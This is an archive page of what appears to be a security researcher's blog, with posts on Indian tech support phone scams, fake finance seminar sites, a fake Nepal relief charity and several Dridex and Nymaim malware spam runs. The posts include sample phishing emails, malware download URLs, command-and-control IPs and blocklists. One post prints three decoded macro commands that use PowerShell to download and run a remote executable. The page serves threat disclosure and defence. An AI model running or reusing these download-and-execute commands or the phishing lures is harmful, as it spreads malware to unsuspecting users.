Sponsored by..

Showing posts with label India. Show all posts
Showing posts with label India. Show all posts

Thursday, 12 January 2017

Scam: 01254522444, the fake BT engineer and 888DCA60-FC0A-11CF-8F0F-00C04FD7D062

In the past few weeks I have seen a huge upsurge in the number of Indian tech support scammers ringing, both at home and my place of work. (For example.. this).

One common trick they use revolves around this hexadecimal number 888DCA60-FC0A-11CF-8F0F-00C04FD7D062. Either it's a signal that hackers are at your PC, or it's your secret router ID that only BT would know.

The conversation goes something like this..

Victim: "But I don't get my internet from BT.."

Scammer: "BT provides all the internet connections for everyone else, including TalkTalk and Virgin Media."

Victim: "How do I know you're from BT?

Scammer: "There is a confidential Router ID that only BT will know. You can verify this to prove that we are BT."

The scammer then talks the victim through pressing -R then CMD (followed by OK) and then ASSOC (followed by RETURN). That simply produces a list of file associations (e.g. to say that .xlsx is an Excel spreadsheet). The line they want you to see is:
.ZFSendToTarget=CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}
This is just something to do with how Windows  handles compressed files and folders. All Windows machines should have t his entry, but it looks sufficiently scary about to impress at least some victims.

NEVER GIVE THESE PEOPLE ACCESS TO YOUR PC.

However, if you want to waste their time please do so.. if you work in IT you can probably play a convincingly dumb user. It seems that they will try for up to 40 minutes or so before they give up. Alternatively, say that you have to get your laptop out from somewhere and it is very slow and just put them on hold. Every minute of their time you can waste will stop them targeting other potential victims.

And don't just ignore the call - report it. If you are in the UK you can report this sort of scam to Action Fraud - it will certainly help law enforcement if they have an idea of how many potential victims there are.

Friday, 23 December 2016

02085258899 - tech support scam (using anydesk.com, teamviewer.com and supremofree.com)

If these people ring you DO NOT GIVE THEM ACCESS TO YOUR PC and either hang up - or waste their time like I do.

It seems there are some prolific technical support scammers ringing from 02085258899 pretending to be from BT. They had a very heavy Indian accent, and they have made many silent calls to my telephone number before today. They claim that hackers are accessing my router.

I wasted 37 minutes of their time, these are some of the steps to watch out for..

  1. They get you to open a command prompt and type ASSOC which brings up a big long list of file associations, in particular they seem interested in one that says .ZFSendToTarget=CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}
  2. Then they get you to bring up the Event Viewer by typing EVENTVWR and then clicking "Custom Views" and "Administrative Events". This is a log file that will always show a whole bunch of meaningless errors (such as network faults). It's quite normal for this to look quite bad to the untrained eye.
  3. Then in order they try to get you to connect to the following services to take remote control of your PC: www.anydesk.com, www.teamviewer.com and www.supremofree.com. All of these are legitimate services,but I have to confess I'd never heard of the last one.. so I will add it to my corporate blacklist.
  4. When those didn't work they tried directing me to a proxy at hide.me/proxy and www.hide.me/proxy (the same thing I know) which is probably another candidate for blocking.
Of course, once they have access to your PC they will try to convince you that you need to pay them some money for technical support. Be warned, that they can render your PC unusable if you don't pay, and they can also steal confidential data. Despite how many times they may tell you they are from BT, they are not.. they are simply fraudsters.

Thursday, 17 December 2015

Malware spam: "Email from Transport for London" / noresponse@cclondon.com

This fake TfL spam is meant to have a malicious attachment, but is malformed.

From:    noresponse@cclondon.com
Date:    17 December 2015 at 08:54
Subject:    Email from Transport for London

Dear Customer,

Please open the attached file to view correspondence from Transport for
London.

If the attachment is in PDF format you may need Adobe Acrobat Reader to
read or download this attachment.

If you require Adobe Acrobat Reader this is available at no cost from
the Adobe Website http://www.adobe.com

Thank you for contacting Transport for London.



Business Operations
Customer Service Representative

______________________________________________________________________
This email has been scanned by the Symantec Email Security.cloud service.
For more information please visit http://www.symanteccloud.com

This email and any attachment are intended solely for the addressee, are s=
trictly confidential and may be legally privileged. If you are not the int=
ended recipient any reading, dissemination, copying or any other use or re=
liance is prohibited. If you have received this email in error please noti=
fy the sender immediately by email and then permanently delete the email.
______________________________________________________________________

The attachment is not properly formatted and appears as a Base 64 section of the email. What it should be is a malicious document named FR7000609906.doc which has a VirusTotal detection rate of 4/54.

The Malwr analysis of the document indicates that it downloads from:

www.riucreatives.com/65dfg77/kmn653.exe

This has a detection rate of 3/54 and an MD5 of d5e717617400b3c479228fa756277be1. The Malwr report and Hybrid Analysis  indicate network traffic to:

151.80.142.33 (OVH, France)
117.239.73.244 (Marian International Institute Of Management, India)


The payload is likely to be the Dridex banking trojan.

Recommended blocklist:
151.80.142.33
117.239.73.244

Tuesday, 15 December 2015

Malware spam: "Invoice Attached" / "Accounting Specialist| Bank of America, N.A., Cabot Oil & Gas Corp."

This fake financial spam has a malicious attachment:

From:    Ernestine Harvey
Date:    15 December 2015 at 11:34
Subject:    Invoice Attached

Good morning,

Please see the attached invoice and remit payment according to the terms listed at the bottom of the invoice. If you have any questions please let us know.

Thank you!

Mr. Ernestine Harvey
Accounting Specialist| Bank of America, N.A., Cabot Oil & Gas Corp.
The sender name varies randomly, except in the email they are all signed "Mr." even if they have female names, for example:

Mr. Colleen Sheppard
Mr. Joel Small
Mr. Esther Gates
Mr. Devin Joyce
Mr. Todd Robertson

The attachments are named in the format invoice_12345678_scan.doc - the filenames are randomly-generated and indeed every attachment seems to be unique. Typical VirusTotal detection rates are around 3/54, and the macro looks something like this.

An analysis of five of the attachments [1] [2] [3] [4] [5] shows attempted downloads from:

modern7technologiesx0.tk/x1656/dfiubgh5.exe
forbiddentextmate58.tk/x1656/ctruiovy.exe
temporary777winner777.tk/x1656/fdgbh44b.exe
former12futuristik888.tk/x1656/fdgjbhis75.exe


Note that these are all .TK domains.. and they are all hosted on exactly the same server of 31.184.234.5 (GTO Ltd, Montenegro). A look at VirusTotal's report for that IP gives another malicious domain of:

servicexmonitoring899.tk

I would suggest that the entire 31.184.234.0/24 range looks pretty questionable.

Anyway, the downloaded binary has a VirusTotal detection rate of 4/55 and the comments indicate that rather surprisingly this is the Nymaim ransomware. The Hybrid Analysis indicates network traffic to xnkhfbc.in on 200.195.138.156 (Szabo & Buhnemann, Brazil). But in fact that domain seems to move around a lot and has recently been seen on the following IPs:

41.224.12.178 (Orange Tunisie Internet, Tunisia)
51.255.59.248 (OVH, France)
78.107.46.8 (Corbina Telecom, Russia)
95.173.163.211 (Netinternet, Turkey)
118.102.239.53 (Dishnet, India)
140.116.161.33 (TANET, Taiwan)
185.114.22.214 (Osbil Technology Ltd., Turkey)
192.200.220.42 (Global Frag Networks, US)
200.195.138.156 (Szabo & Buhnemann Ltda, Brazil)
210.150.126.225 (HOSTING-NET, Japan)


There are a bunch of bad domains associated with this malware but the only other one that seems to be active is oxrdmfdis.in.

MD5s:
4CADF61E96C2D62292320C556FD34FE6
BBAAAB1245D7EDD40EE501233162110E
6B6C7430D33FE16FAE94162D61AF35DD
79A10791B1690A22AB4D098B9725C5E0
D148440E07434E4823524A03DE3EB12F
79A10791B1690A22AB4D098B9725C5E0
B41205F6AEEEB1AA1FD8E0DCBDDF270E



Recommended blocklist:
31.184.234.5
41.224.12.178
51.255.59.248
78.107.46.8
95.173.163.211
118.102.239.53
140.116.161.33
185.114.22.214
192.200.220.42
200.195.138.156
210.150.126.225
xnkhfbc.in
oxrdmfdis.in


UPDATE

A source tells me (thank you) that  servicexmonitoring899.tk  is now resolving to 78.129.252.19 (iomart, UK) that has also recently hosted these following domains:

google-apsm.in
specre.com
ganduxerdesign.com
www.ganduxerdesign.com
upmisterfliremsnk.net
tornishineynarkkek.org
tornishineynarkkek2.org

Some of these domains are associated with Rovnix.

Thursday, 26 November 2015

Random "Payment" spam leads to Dridex

I have only seen one version of this spam message so far:

From:    Basia Slater [provequipmex@provequip.com.mx]
Date:    26 November 2015 at 12:00
Subject:    GVH Payment

I hope you had a good weekend.
Please check the payment confirmation attached to this email. The Transaction should appear on your bank in 2 days.


Basia Slater
Accountant
Comerica Incorporated
This sample had a document name of I654WWFR3C6.doc which has a VirusTotal detection rate of 6/55, containing this malicious macro [pastebin]. The Malwr report for this version indicates a download from:

harbourviewnl.ca/jo.jpg?6625

According to that Malwr report, it drops a file YSpq2bkGVIi5yaPcv6667.exe (MD5 6c14578c2b77b1917b3dee9da6efcd56) which has a detection rate of 1/53. The Hybrid Analysis report and Malwr report for that indicates malicious traffic to:

94.73.155.10 (Telekomunikasyon Anonim Sirketi, Turkey)
199.175.55.116 (VPS Cheap INC, US)


Note that 94.73.155.12 is mentioned in this other Dridex report today, both IPs form part of a small subnet of  94.73.155.8/29 suballocated to one "Geray Timur Akkurt".

My contacts (you know who you are, thank you) indicate that the emails are generated according to the following pattern:

> From: (random)
> Subject: ABC Transaction
- raw Subject: =?UTF-8?Q?ABC__Transaction?=
- matching /[A-Z]{1,3} (Invoice|Payment|Transaction|Transfer)/
> X-mailer: Thunderbird 9.23
- matching /[1-9]\.[1-9]{2}/
Attachment: "Z98Y76.doc"
- matching /[A-Z0-9]{4,14}\.doc/
They indicate an additional download location of:

gofishretail.com/jo.jpg?[4-digit-random-number]

with an additional C2 location of:

113.30.152.170 (Net4india , India)

Recommended blocklist:
94.73.155.8/29
199.175.55.116
113.30.152.170



Monday, 26 October 2015

Fake seminar sites to avoid, registered to vravindhar@yahoo.com

A contact tipped me off to some fake financial seminar sites, all linked to the email address vravindhar@yahoo.com. They are promoted in spam emails similar to these:

From: rob.koster@fatcacomplianceinstitute.com [mailto:rob.koster@fatcacomplianceinstitute.com]
Sent: Wednesday, August 05, 2015 8:33 AM
To: redacted
Subject: FATCA Compliance - [redacted]
Importance: High

Dear Participants,

We are pleased to announce you that FATCA Compliance Institute is conducting a 2 day practical seminar on FATCA Compliance.

This seminar is going to be repeated and held thrice:
[redacted]

The seminar is open to all the Banking & Financial Professionals. The seminar particulars are attached with this mail.

Last date for enrolling your participation is [redacted], 2015.

Please contact for assistance.

Truly,
Rob Koster
Seminar Secretary
Tel:+31-800-020-0534(Netherlands and Other EU Countries) 
       +1-312-625-0112(All Other Countries)
FAX:+31-800-020-0534

And also..

 From: alfred@pacibankers.com [mailto:alfred@pacibankers.com]
Sent: Wednesday, February 11, 2015 11:50 AM
Subject: Asset Management Auditing and Internal Accounting Controls - [redacted]
Importance: High




Asset Management Auditing and Internal Accounting Controls - 2 Day Program

Dear Delegate
Pacific Standards (www.pacificstandards.com) would like to invite representatives from your organization to attend the above mentioned program scheduled for 2015. We are limiting the number of participants for each cluster to 20, as the courses are designed to be interactive and to encourage discussion and the exchange of ideas.

Program Dates:      Cluster I – February 25 - 26, 2015 
                                      Cluster II – March 9 - 10, 2015                                  
                                      Cluster III - March 18 - 19, 2015 
                                      Cluster IV- April 6 - 7, 2015
                                      Cluster V- April 15 - 16, 2015
                                 
Venue: {redacted}
We invite you to nominate individuals from your respective organization. It is also important to stress that all available slots will be filled on a first come first serve basis. Please advise your colleagues to attend and take advantage of this valuable and pivotal workshop.(Please see the attached brochure for complete course coverage).
Early Registration Deadline is February 15, 2015 
Last Date of Registration is February 17, 2015 


Looking forward for an early reply.

Thanks & Regards,
Alfred
Pacific Standards
Marketing Manager
Contact Number: +91-8801-990-204

Emails are sent from 159.253.145.90 (Softlayer, Netherlands). The registrant details look like this on most of the domains:
Registry Registrant ID:
Registrant Name: Ravindhar V
Registrant Organization:
Registrant Street: office:7, sushant lok , sushant estate
Registrant City: gugaon
Registrant State/Province: Haryana
Registrant Postal Code: 122002
Registrant Country: India
Registrant Phone: +91.9999960651
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: vravindhar@yahoo.com
Registry Admin ID:
The emails specifically target the finance sector with what appear to be relevant seminars and services, however once payment has been received there is reportedly no further communication and no seminars.

There are a large number of related sites, some using several different domains. There are virtually zero references to these "organisations" on Google, and a close examination of the sites shows several red flags.

Pacific Standards

Claiming to be in Singapore, but boasting an Indian phone number of +91-8801990204, this outfit claims to be part of "Grenoble Learning". Neither Pacific Standards nor Grenoble Learning actually appear to exist.


Domains used:
pacificstandards.com
pacibankers.com
pacific-compliance.com
pacificstan.cc
pacificstan.com
pacificstandards.org

Brown & Co

This claims to be based as 12 Flemington Street, Glasgow but quotes a US contact number of 1-800-BRO-CORP / 1-800-246-8115.  There are many, many companies in the UK with the name "Brown & Co", but where you would expect to see number 12 on that street.. there appears to be a car park.

Domains used:

beta-essentials.me
browncorpuk.org
browncorp.co
betaeventhub.org
betaeventhub.org
betaessentials.in

FATCA Compliance Institute

A quick Google search for "FATCA Compliance Institute" reveals exactly zero reliable references to this important-looking organisation, boasting contact details in both India and The Netherlands.
15-66 plot 101 Prabhu Nagar
Poranki 521137.
Tel:+31-800-020-0534(Netherlands and Other EU Countries)
FAX:+31-800-020-0534 (ONLY EU)
FAX: +31-20-524-1592 (ALL COUNTRIES)
USA Tel: +1-312-625-0112 (All other Countries)
Email: director@fatcacompliance.cc

Corporate Office:

Keizersgracht 209
1006 DT Amsterdam
The Netherlands
The Netherlands Toll-Free:
Tel:+31-800-020-0534
FAX:+31-800-020-0534

USA Tel: +1-312-625-0112 (All other Countries)
Email: director@fatcacompliance.cc

Domains used:

fatcacomplianceinstitute.org
fatcacomplianceinstitute.com
fatcacompliance.cc
fatcacompliance.net
fatcacompliance.org

Rightman Group

The web site here looks very slick. But if you Google for snippets of somewhat ungrammatical text (such as "But, one things remains unchanged – our dedication to doing the best work in the world.") you will find that there are hundreds of sites using the exact same template. Rightman Group has the following contact details listed:

Rightman Group
 United States
199 Scott Street
Suite 810
Buffalo, NY 14204
+1-716-217-2817
USA call charges apply.
---------
 Dreikönigstrasse 30
Zürich, Switzerland
----------
+41-43-508-1974 

The New York State Division of Corporations has no such company as "Rightman Group" listed.


Domains used:

rightmangroup.com
rightman.eu
rightman.cc
rightmangroup.net
rightmangroup.org

Swiss Dossier

I can only imagine that the name "Swiss Dossier" came about through an error in autotranslation. It lists several addresses:

info@swissdossier.com(General)
offices@swissdossier.com(Training Programs)

Tel:  +1-786-235-8424(USA)

Our Global offices are located at:
19th Floor, Prudential Towers(North Side)
Office no: 1901
Chulia Street
Singapore

Aeschenvorstadt, 405
Basel,
Switzerland

79 Thornall Street,
6th Floor, Edison, NJ 08837.
New Jersy
USA

70 Sheppard Avenue, Suite 301,
North York, Ontario M2N 3A4,
Canada

A Google search for "swissdossier.com" comes up with no independent and reliable references to this so-called company.


Domains used:

swissdossier.com
swissdossier.cc
swissdossier.com.co

Treasury Management Institute

According to Companies House in the UK, there is no company in the UK with the name "Treasury Management Institute". The contact details indicate that this is perhaps the workplace of John or Jane Doe:

Email : 
 jdoe@treasurymanagementinstitute.com
 jdoe@treasurymanagementinstitute.cc
Addresses:
01, Temple Quay, Temple Back East, Bristol, BS1 6DZ, UK
SWConsulting Group, Sec 42 Gurgaon, India(Institute operates under the licence of SWConsulting Group)
There are no independent references to this organisation existing in Bristol.


Domains used:

treasurymanagementinstitute.com
treasurymanagementinstitute.cc
treasurymanagementinstitute.org

Financial Models India

Sharing the same contact details as some of these other highly questionable sites, and hosted on the same infrastructure, Financial Models India would appear to fail the Duck Test.

79 Thornall Street,
6th Floor, Edison, NJ 08837,
New Jersy,
USA

19th Floor,
Prudential Towers (North Side),
Office no: 1901,
Chulia Street, Singapore

Aeschenvorstadt, 405,
Basel, Switzerland

70 Sheppard Avenue,
Suite 301, North York,
Ontario M2N 3A4,
Canada

DLF Square M Block,
Jacaranda Marg DLF City, Phase II,
Gurgaon 122002, INDIA  

Domains used:

financialmodelsindia.com
financialmodels.co.in
fmtsglobal.com
unitedcapital-financialmodels.com
unitedcapitalglobal.com

Virat World Wide

This appears to be the firm or individual behind these sites. The "About Us" page says:

Ravindhar.V - Managing Director

Mr. Ravindhar is an able administrator and change master. He has rich experience in thearea of Financial Information Technology(FIT). He has developed financial software products and Information Technology management solutions for financial institutions and banks in more than a fifty countries and for top global Banks and companies. His qualification is Master of Finance and Accounting with a track of computer applications in Finance and Accounting(MFA). Mr.Ravindhar comes from Business Family of Poranki Sugars and his family is a legacy of entrepreneurs based in India. Group is widely respected by the industry.
I'm guessing the the "V" stands for "Virat", making him "Ravindhar Virat". The contact details list an address in the... errr. UNITED KIGDOM.

Global Support
+919-618-921-876
customersupport@virat.consulting
120, CENTRAL STREET
CLERKENWELL
LONDON
UNITED KIGDOM
This address is actually a hotel. The +91 telephone number is a number in India, not the UK.


Domains used:

virat.consulting
virat-transitionalhunts.biz
virat-th.co.in

Other domains

The other domains (mostly now defunct or with no content) also appear to belong to the same operator:

financialmodelsglobal.net
fortunicia-munich.org

europiafintech.com
europiafintech.net

fisher-n-moreglobal.com
fishernmore-global.org
fmg-singapore.org

intrinsic-pulse.com
intrinsic-pulse.asia


baselknowledge.net
clarklc.com
luthanskane.in
panarab-consulting.in
porankisugars.org
profectuspartners-singapore.com
proximitycorp.org
rfb-research.net
sino-overseasholdings.org
stermarc-worldwide.com
vertasbar.net

If you have any experiences with any of these "companies", feel free to leave a comment.






Thursday, 30 April 2015

Nepal Earthquake scam: savenepal.org

I was tipped off to this site by a contact, but it appears that there are some particularly dispicable scammers who have registered a fake website called savenepal.org which is soliciting donations via PayPal.

The site largely cloned from the legitimate ActionAid site which is genuinely seeking donations to go to Nepal.

ActionAid is "Registered charity no 274467" (it says so on the bottom of the page). SaveNepal.org claims to be "Registered charity no 276187", but we can check at the UK charities commission and we can see that the charity with this number is actually an orchestra.


Clicking "Donate" on the scam site leads to PayPal. It doesn't give much of a clue about the ownership of the fake site:


The WHOIS details for the domain are hidden using WhoIsGuard. These other sites appear to be live on the same server:

com-indexhtml.link
com-indexhtml.us
grantsekit.com

Out of these, only com-indexhtml.us has a non-anonymous WHOIS entry:

Registrant ID:                               C4E83B25FA8AD52D
Registrant Name:                             Frank J. Moore
Registrant Address1:                         2441 Byers Lane
Registrant City:                             Davis
Registrant State/Province:                   CA
Registrant Postal Code:                      95616
Registrant Country:                          United States
Registrant Country Code:                     US
Registrant Phone Number:                     +1.5307574940
Registrant Email:                            uscustomerhelp@gmail.com
Registrant Application Purpose:              P1
Registrant Nexus Category:                   C12


I'm pretty sure that those contact details are fake. Going back through historical WHOIS comes up with different contact details:

Registrant ID:                               29B0B5BBD7190398
Registrant Name:                             dinna  james
Registrant Address1:                         po box 876
Registrant City:                             dl
Registrant State/Province:                   dl
Registrant Postal Code:                      110098
Registrant Country:                          India
Registrant Country Code:                     IN
Registrant Phone Number:                     +1.918978978
Registrant Email:                            helpot80@gmail.com
Registrant Application Purpose:              P1
Registrant Nexus Category:                   C12


Of course, these contact details could also be false and there's no definite connection to savenepal.org yet. But out of curiosity, who is helpot80@gmail.com?  Googling doesn't reveal much, but it does show a copy of a conversation in the news.admin.net-abuse.email where someone who is claiming to use this email address is complaining about spam. If we then use Google Groups to find the original newsgroup post we see it was posted from an IP of 182.68.85.242 which is a dynamic Bharti Airtel IP in India, which does at least match the country in the WHOIS details.

Another Google result is this Phishtank entry listing social2013.com/rockgrade/ which appears to be a copy of the Rock Grade Management scam site I covered way back in 2011, indicating that perhaps these two scams are related. helpot80@gmail.com was listed as the owner of social2013.com before it expired in February 2015.

This WHOISology report links the address to several domains:

beauty6k.com
social2013.com
droughty.com
auto36.us
secure2013.us

Also, 94.242.255.129 has hosted many other domains, many of which appear to be scammy.

com-13.pw
com-21.us
com-indexhtml.us
news7d.com
mynews360.com
grantsekit.com
social2013.com
secured2014.com
usgrantskit.com
savenepal.org
com-indexhtml.link
huffingtonpost.com-indexhtml.link
dear.graphics

Many of these have the helpot80@gmail.com address listed in their historical WHOIS entries.

What else can we find out?

The email address is connected with this scammy looking Facebook page allegedly giving away "free laptops"



The email address also links to this Google+ profile naming them as "N. Al.". It also links to this YouTube channel with a single video about Payoneer. These Profiles indicate that helpot80@gmail.com has an interest in affiliate marketing, an activity with a mixed reputation.

I cannot prove that helpot80@gmail.com is connected with the savenepal.org, but they probably know whoever is behind it.

Remember, if you want to donate to ANY disaster charity, it is worth checking very carefully that you are dealing with the real thing and not a bunch of scammers.

Tuesday, 7 April 2015

Malware spam: "EBOLA INFORMATION" / "noreply@ggc-ooh.net"

This fake medical email contains a malicious attachment. It's a novel approach by the bad guys, but I doubt that many people will find it believable enough to click.

From:    noreply@ggc-ooh.net
Reply-To:    noreply@ggc-ooh.net
Date:    7 April 2015 at 08:58
Subject:    EBOLA INFORMATION

This email is generated from an unmanned mailbox. Dr N J Gaw can be contacted via noreply@ggc-ooh.net

PLEASE SEE THE ATTACHED CORRESPONDENCE FOR YOUR INFORMATION.

THANK YOU.
Attached is a file 30.03.15 Ebola Virus (2).doc which contains this malicious macro [pastebin] which is contains a lot of girls names as variables (which makes a nice change from the randomly-generated stuff I suppose).

When decoded the macro downloads a component from:

http://deosiibude.de/deosiibude.de/220/68.exe

VirusTotal submissions seem to be down at the moment, so I can't tell you what the detection rate is. Automated analysis tools [1] [2] [3] show it phoning home to the following IPs (ones in bold are most likely static, the others look to be dynamic):

37.140.199.100 (Reg.Ru Hosting, Russia)
46.228.193.201 (Aqua Networks Ltd, Germany)
130.241.92.141 (Goteborgs Universitet, Sweden)
46.101.49.125 (Digital Ocean Inc, UK)
122.167.6.68 (ABTS, India)
5.100.249.215 (O.M.C. Computers & Communications Ltd, Israel)

85.255.173.109 (Satnet Ltd, Bulgaria)
217.37.39.235 (BT Broadband, UK)
81.190.50.232 (Multimedia Polska S. A., Poland)
89.228.15.18 (Multimedia Polska S. A., Poland)

According to the Malwr report it drops a whole load of files including what is probably a Dridex DLL.

Recommended blocklist:
37.140.199.100
46.228.193.201
130.241.92.141
46.101.49.125
122.167.6.68
85.255.173.109
5.100.249.215
217.37.39.235
81.190.50.232
46.228.193.201
89.228.15.18


MD5s:
E4CC002A95CAAF4481CB7140BBE96C58
C86A9D012E372D0C3A82B14978FFA1F0
F98A674A5FA473AC9BF738636FF6374E



Thursday, 2 April 2015

Malware spam: "Copy invoices Snap on Tools Ltd" / "Allen, Claire [Claire.Allen@snapon.com]"

This fake invoice does not come from Snap On Tools, but is instead a simple forgery.

From:    Allen, Claire [Claire.Allen@snapon.com]
Date:    24 February 2015 at 14:41
Subject:    Copy invoices Snap on Tools Ltd

Good Afternoon

Attached are the copy invoices that you requested.

Regards

Claire

Your message is ready to be sent with the following file or link attachments:

SKETTDCCSMF14122514571


Note: To protect against computer viruses, e-mail programs may prevent sending or receiving certain types of file attachments.  Check your e-mail security settings to determine how attachments are handled.
I have only seen one copy of this with an attachment SKETTDCCSMF14122514571.doc which contains this malicious macro [pastebin], which downloads a further component from:

http://ws6btg41m.homepage.t-online.de/025/42.exe

This executable has a detection rate of 5/57. Various automated analyses [1] [2] [3] [4] show attempted communications to the following IPs:

91.242.163.70 (OOO Sysmedia, Russia)
72.167.62.27 (GoDaddy, US)
62.113.219.35 (23Media GmbH, Germany)
46.101.49.125 (Digital Ocean, UK)
130.241.92.141 (Goteborgs Universitet, Sweden)
198.245.70.182 (Deniz Toprak / B2 Net Solutions Inc., US)
94.23.173.233 (OVH, Czech Republic)
14.98.243.243 (Tata Indicom, India)
5.100.249.215 (O.M.C. Computers & Communications, Israel)
62.113.223.227 (23Media GmbH, Germany)

According to this Malwr report  it drops another version of the downloader called edg1.exe [VT 4/57] and a malicious Dridex DLL [VT 2/57].

Recommended blocklist:
91.242.163.70
72.167.62.27
62.113.219.35
46.101.49.125
130.241.92.141
198.245.70.182
94.23.173.233
14.98.243.243
5.100.249.215
62.113.223.227

MD5s:
dc92858693f62add2eb4696abce11d62
6fb2f86986e074cf44bd4c9f68e9822e
9565b17a4f1221fee473d0d8660dc26d
62e780a6237c6f9fd0a8e16a2823562d





Wednesday, 25 February 2015

Malware spam: "Your LogMeIn Pro payment has been processed!"

This fake financial email does not come from LogMeIn, instead it has a malicious attachment:

From:    LogMeIn.com [no_reply@logmein.com]
Date:    25 February 2015 at 08:52
Subject:    Your LogMeIn Pro payment has been processed!

Dear client,

Thank you for purchasing our yearly plan for LogMeIn Pro on 25 computers.
Your credit card has been successfully charged.

Date : 25/2/2015
Amount : $999 ( you saved $749.75)



The transaction details can be found in the attached receipt.
Your computers will be automatically upgraded the next time you sign in.


Thank you for choosing LogMeIn!
Attached is a malicious Excel document called logmein_pro_receipt.xls with a VirusTotal detection rate of 0/56. Usually in a spam run like this there are several different versions of the document but so far I have only seen one, containing this malicious macro. The macro downloads a file from:

http://junidesign.de/js/bin.exe

This is saved as %TEMP%\GHjkdfg.exe and has a VirusTotal detection rate of 3/57. Automated analysis tools [1] [2] [3] show this calling home to the following IPs:

92.63.87.13 (MTWV, Latvia)
86.104.134.156 (One Telecom, Moldova)
217.12.203.34 (ITL, Bulgaria)
108.61.165.19 (Choopa LLC, Netherlands)
5.196.241.196 (OVH, Ireland)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
95.163.121.179 (Digital Networks aka DINETHOSTING, Russia)
59.97.137.171 (Broadband Multiplay, India)
78.140.164.160 (Webazilla, US)
107.181.174.104 (Colo at 55, US / UA Servers, Ukraine)
I outlined some of the problems with MVTW in this post. The Malwr report shows that among other activities, this drops an executable that seems to be another version of itself [VT 3/57] and a malicious DLL which is probably a Dridex component [VT 4/57].

Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
86.104.134.156
217.12.203.34
108.61.165.19
5.196.241.196
66.110.179.66
202.44.54.5
95.163.121.179
59.97.137.171
78.140.164.160
107.181.174.104

UPDATE:  a different version of the attachment [VT] uses this macro to download from:

http://jacekhondel.w.interia.pl/js/bin.exe

The payload is identical to the other variant.

Thursday, 19 February 2015

Malware spam: "Maria Wilson" / "securigroup.co.uk" / "Statement"

This fake financial spam does not come from SecuriGroup, their systems have not been compromised in any way nor has there been any leak of information. Instead, this is a simple forgery with a malicious document attached.

From:    Maria Wilson [maria.wilson6870@securigroup.co.uk]
Date:    19 February 2015 at 09:10
Subject:    Statement

Please see attached up to date statement.

I would be grateful if you could confirm all due invoices have been processed for payment.

Many thanks
Maria

Maria Wilson | Credit Controller

T: 0141 285 3838


www.securigroup.co.uk


Think Sustainability - Do not print this email unless essential


This email and any attachments are confidential and intended for the addressee only.

If you are not the named recipient, you must not use, disclose, reproduce, copy or distribute the contents of this communication.

If you have received this in error, please contact the sender and then delete this email from your system.
The impact on this innocent company appears to be severe, with their website currently suspended.

I have only seen only sample of the attachment Statement 18 FEB 2015.xls although there are probably other variants. This contains a set of macros [password=infected] which are mostly crap, but the key parts are Modules 13 (the encrypted strings) and 27 (the decrypt function). These macros download a file from the following location:

http://hazardcheck.de/js/bin.exe

This is saved as %TEMP%\FfdgF.exe which has a VirusTotal detection rate of 5/57. Various automated analysis tools [1] [2] [3] show attempted network connections to:

83.169.4.178 (Hosteurope, Germany)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
14.99.146.242 (Tata Indicom, India)
78.140.164.160 (Webazilla, US)
220.143.5.92 (Chunghwa Telecom, Taiwan)
217.12.203.34 (ITL Company, Bulgaria)

The Malwr report shows it dropper another version of the downloader (VT 3/57) and a malicious DLL (VT 6/57). Payload is probably Dridex.

Recommended blocklist:
83.169.4.178
66.110.179.66
202.44.54.5
14.99.146.242
78.140.164.160
220.143.5.92
217.12.203.34



Monday, 16 February 2015

Malware spam: "Re: Data request [ID:91460-2234721]" / "Copy of transaction"

This rather terse spam comes with a a malicious attachment:

From: Rosemary Gibbs
Date:    16 February 2015 at 10:12
Subject:    Re: Data request [ID:91460-2234721]

Copy of transaction.
The sender's name, the ID: number and the name of the attachment vary in each case. Example attachment names are

869B54732.xls
BE75129513.xls
C39189051.xls

None of the three attachments are detected by anti-virus vendors [1] [2] [3]. They each contain a slightly different macro [1] [2] [3]. The critical part of the encoded macro looks like this (click to enlarge):

It's quite apparent that this is ROT13 encoded which you can easily decrypt at rot13.com rather than working through the macro. These three samples give us:

"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';" 
"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.104/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';" 
"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.175.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';"
So, these macros are attempting to use Powershell to download and execute the next step (possibly to avoid the UAC popup). The downloaded binary has a VirusTotal detection rate of 3/57 and automated analysis tools [1] [2] [3] show attempted communications with:

85.143.166.72 (Pirix, Russia)
205.185.119.159 (FranTech Solutions, US)
92.63.88.87 (MWTV, Latvia)
173.226.183.204 (TW Telecom, Taiwan)
27.5.199.115 (Hathway Cable and Datacom, India)
149.171.76.124 (University Of New South Wales, Australia)
46.19.143.151 (Private Layer, Switzerland)


It also drops a DLL with a 4/57 detection rate which is the same malware seen in this attack.

Recommended blocklist:
85.143.166.72
205.185.119.159
92.63.88.87
173.226.183.204
27.5.199.115
149.171.76.124
46.19.143.151


Malware spam: "T.A.G. (The Automotive Group) Ltd." / "Lawrence Fisher [l.fisher@taghire.co.uk]" / invoice

This fake invoice does not come from The Automotive Group Ltd or any similarly-named company. Their systems have not been compromised in any way. Instead, this is a forgery with a malicous attachment. Note that the taghire.co.uk simply shows "Under Construction".
From:    Lawrence Fisher [l.fisher@taghire.co.uk]
Date:    16 February 2015 at 08:25
Subject:    invoice

Here is the invoice

Kind Regards,

Lawrence Fisher
T.A.G. (The Automotive Group) Ltd.
Unit 22 Coney Green Business Centre Wingfield View, Clay Cross, Chesterfield

Tel: 020 3750 0638

Description: 150px Crop Background Remove Logo

This e-mail is confidential and may be privileged.  It may be read, copied and used only by the intended recipient. If you have received it in error, please contact the sender immediately by return e-mail or by telephoning 020 3750 0638
